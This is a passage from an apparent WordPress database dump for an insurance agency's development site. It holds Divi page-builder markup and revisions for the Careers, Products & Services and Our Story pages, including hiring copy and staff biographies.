link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:05:01','2023-04-03 23:05:01','',138,'http://cmdev-site1.com/?p=691',0,'revision','',0),(693,1,'2023-04-03 23:12:31','2023-04-03 23:12:31','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','publish','closed','closed','','careers','','','2023-04-03 23:12:31','2023-04-03 23:12:31','',0,'http://cmdev-site1.com/et_pb_layout/careers/',0,'et_pb_layout','',0),(694,1,'2023-04-03 23:13:18','2023-04-03 23:13:18','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','trash','closed','closed','','products-services__trashed','','','2023-04-03 23:19:25','2023-04-03 23:19:25','',0,'http://cmdev-site1.com/?page_id=694',0,'page','',0),(695,1,'2023-04-03 23:12:45','2023-04-03 23:12:45','','Auto Draft','','inherit','closed','closed','','694-revision-v1','','','2023-04-03 23:12:45','2023-04-03 23:12:45','',694,'http://cmdev-site1.com/?p=695',0,'revision','',0),(697,1,'2023-04-03 23:13:18','2023-04-03 23:13:18','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Auto Draft','','inherit','closed','closed','','694-revision-v1','','','2023-04-03 23:13:18','2023-04-03 23:13:18','',694,'http://cmdev-site1.com/?p=697',0,'revision','',0),(698,1,'2023-04-03 23:13:21','2023-04-03 23:13:21','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','694-revision-v1','','','2023-04-03 23:13:21','2023-04-03 23:13:21','',694,'http://cmdev-site1.com/?p=698',0,'revision','',0),(702,1,'2023-04-03 23:24:23','2023-04-03 23:24:23','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Our Story</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" custom_padding=\"||52px|||\" global_colors_info=\"{}\"]<h3><b>Matthew Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and 